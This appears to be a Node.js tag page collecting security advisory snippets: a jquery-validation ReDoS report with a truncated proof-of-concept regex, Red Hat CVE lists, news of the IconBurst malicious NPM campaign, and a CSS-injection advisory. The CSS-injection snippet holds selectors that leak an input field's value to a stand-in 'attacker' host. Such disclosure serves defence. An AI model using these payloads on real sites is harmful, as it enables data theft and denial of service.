#nodejs

**Summary** The issue is the same as CVE-2021-43306: An exponential ReDoS (Regular Expression Denial of Service) can be triggered in the jquery-validation npm package, when an attacker is able to supply arbitrary input to the url2 method The fix for CVE-2021-43306, which was suggested by me ([@erik-krogh](https://github.com/erik-krogh)), was incomplete. I didn't know at the time that the fix was incomplete, but the ReDoS analysis in CodeQL has improved since then. **Details** Issue: ReDoS in url2.js (GHSL-2022-039) Below is a PoC that contains the relevant regular expression. Run following script with node and you will notice that it doesn't terminate. ```js const reg = /^(?:(?:(?:https?|ftp):)?\/\/)(?:\S+(?::\S*)?@)?(?:(?!(?:10|127)(?:\.\d{1,3}){3})(?!(?:169\.254|192\.168)(?:\.\d{1,3}){2})(?!172\.(?:1[6-9]|2\d|3[0-1])(?:\.\d{1,3}){2})(?:[1-9]\d?|1\d\d|2[01]\d|22[0-3])(?:\.(?:1?\d{1,2}|2[0-4]\d|25[0-5])){2}(?:\.(?:[1-9]\d?|1\d\d|2[0-4]\d|25[0-4]))|(?:(?:[a-z0-9\u00a1-\uffff][a-z0-...

Red Hat OpenShift Container Platform release 4.9.41 is now available with updates to packages and images that fix several bugs.This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original. Related CVEs: * CVE-2022-27652: cri-o: Default inheritable capabilities for linux container should be empty

A widespread campaign uses more than 24 malicious NPM packages loaded with JavaScript obfuscators to steal form data from multiple sites and apps, analysts report.

An attacker is able to inject arbitrary `CSS` into the generated graph allowing them to change the styling of elements outside of the generated graph, and potentially exfiltrate sensitive information by using specially crafted `CSS` selectors. The following example shows how an attacker can exfiltrate the contents of an input field by bruteforcing the `value` attribute one character at a time. Whenever there is an actual match, an `http` request will be made by the browser in order to "load" a background image that will let an attacker know what's the value of the character. ```css input[name=secret][value^=g] { background-image: url(http://attacker/?char=g); } ... input[name=secret][value^=go] { background-image: url(http://attacker/?char=o); } ... input[name=secret][value^=goo] { background-image: url(http://attacker/?char=o); } ... input[name=secret][value^=goos] { background-image: url(http://attacker/?char=s); } ... input[name=secret][value^=goose] { background-image: url(http:/...

An update is now available for Red Hat Satellite 6.11This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original. Related CVEs: * CVE-2021-3200: libsolv: heap-based buffer overflow in testcase_read() in src/testcase.c * CVE-2021-3584: foreman: Authenticate remote code execution through Sendmail configuration * CVE-2021-4142: Satellite: Allow unintended SCA certificate to authenticate Candlepin * CVE-2021-21290: netty: Information disclosure via the local system temporary directory * CVE-2021-21295: netty: possible request smuggling in HTTP/2 due missing validation * CVE-2021-21409: netty: Request smuggling via content-length header * CVE-2021-30151: sidekiq: XSS via the queue name of the live-poll feature * CVE-2021-32839: python-sqlparse: ReDoS via regular expression i...

A widespread software supply chain attack has targeted the NPM package manager at least since December 2021 with rogue modules designed to steal data entered in forms by users on websites that include them. The coordinated attack, dubbed IconBurst by ReversingLabs, involves no fewer than two dozen NPM packages that include obfuscated JavaScript, which comes with malicious code to harvest

This affects the package passport before 0.6.0. When a user logs in or logs out, the session is regenerated instead of being closed.

All versions of package scss-tokenizer are vulnerable to Regular Expression Denial of Service (ReDoS) via the loadAnnotation() function, due to the usage of insecure regex.

All versions of package git-clone are vulnerable to Command Injection due to insecure usage of the --upload-pack feature of git.

All versions of package scss-tokenizer are vulnerable to Regular Expression Denial of Service (ReDoS) via the loadAnnotation() function, due to the usage of insecure regex.